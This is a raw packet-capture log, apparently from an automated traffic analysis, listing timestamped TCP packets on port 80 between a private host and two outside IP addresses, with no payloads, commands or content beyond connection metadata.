Sep 21, 2024 14:48:09.848596096 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.848623991 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.849220037 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849240065 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849251032 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849270105 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.849311113 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.849344015 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849354982 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849364996 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849375010 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849385023 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.849427938 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.849498034 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849509954 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849519968 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849533081 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.849543095 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.849574089 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.849766970 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.849786997 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.849827051 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.849852085 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.849870920 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.851128101 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.851171970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.851181030 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.851223946 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.879393101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879417896 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879427910 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879448891 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879478931 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879483938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879497051 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879508018 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879524946 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879551888 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879585981 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879599094 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879609108 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879621029 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879626036 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879657984 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879698992 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879710913 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879740953 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879777908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879789114 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879803896 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879815102 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879821062 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879839897 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879861116 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879934072 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879945993 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.879971027 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.879986048 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.884212971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884268045 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884318113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884329081 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884339094 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884368896 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884396076 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884465933 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884476900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884489059 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884500980 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884505987 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884521961 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884543896 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884568930 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884588003 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884598970 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884612083 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884640932 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884670973 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884685040 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884696007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884716034 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884753942 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884766102 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884802103 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884814024 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884824038 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884835005 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884845972 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884850979 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884866953 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884885073 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884896040 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.884897947 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.884934902 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885220051 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885265112 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885298967 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885341883 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885348082 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885354042 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885385990 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885397911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885442972 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885454893 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885464907 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885477066 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885487080 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885489941 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885518074 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885531902 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885590076 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885601044 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885611057 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885622978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885633945 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885637045 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885644913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885654926 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885674000 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885700941 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885732889 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885745049 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885754108 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885766029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885776043 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885803938 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885829926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885842085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885853052 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885865927 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885874033 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885876894 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885889053 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885900021 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885902882 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.885930061 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.885942936 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886183977 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886195898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886205912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886240005 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886255026 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886346102 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886358023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886368036 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886379004 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886390924 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886393070 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886400938 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886411905 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886413097 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886425018 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886437893 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886464119 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886466980 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886475086 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886485100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886496067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886507988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886508942 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886528015 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886553049 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886555910 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886568069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886578083 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886590004 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.886599064 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886625051 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.886648893 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889391899 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889432907 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889440060 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889445066 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889475107 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889487982 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889504910 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889517069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889527082 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889539957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889545918 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889569044 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889600039 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889698029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889708996 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889723063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889740944 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889769077 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889769077 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889781952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889794111 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889805079 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889811993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889816999 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889839888 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889866114 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889893055 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889904976 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889914989 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889925957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889938116 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889939070 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889950037 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.889957905 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.889985085 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890016079 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890043020 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890057087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890086889 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890103102 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890119076 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890130997 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890165091 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890182018 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890183926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890196085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890207052 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890228987 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890259027 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890317917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890327930 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890338898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890350103 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890361071 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890388012 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890423059 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890434980 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890444040 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890460968 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890466928 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890471935 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890491009 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890512943 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890516996 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890554905 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890779018 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890796900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890808105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890825033 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890855074 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890882015 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890893936 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890925884 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890950918 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.890973091 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890985012 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.890995026 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.891001940 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.891024113 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.891035080 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.891062975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.891088963 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.891100883 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.891112089 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.891122103 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.891136885 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.891165972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.909058094 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909082890 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909095049 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909131050 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909167051 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909193993 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909342051 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909362078 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909373045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909385920 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909410954 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909476042 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909487009 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909497023 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909507990 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909518003 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909523010 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909538984 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909563065 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909645081 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909656048 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909667969 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909684896 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909706116 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909770012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909780979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909785986 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909797907 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909818888 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909833908 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909871101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909909010 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.909955025 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909965992 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909970045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909975052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.909981012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910058022 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910106897 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910118103 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910128117 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910136938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910151005 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910161018 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910187006 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910257101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910268068 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910278082 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910290003 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910295010 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910306931 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910329103 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910372019 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910382986 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910408020 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910408974 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910419941 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910444975 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910468102 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910475016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910486937 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910495996 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910506964 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910511971 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910520077 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910527945 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910557985 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910722017 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910733938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910743952 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910754919 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910758018 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910768032 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910778046 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.910792112 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910811901 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.910989046 CEST	80	49713	176.113.115.33	192.168.2.9
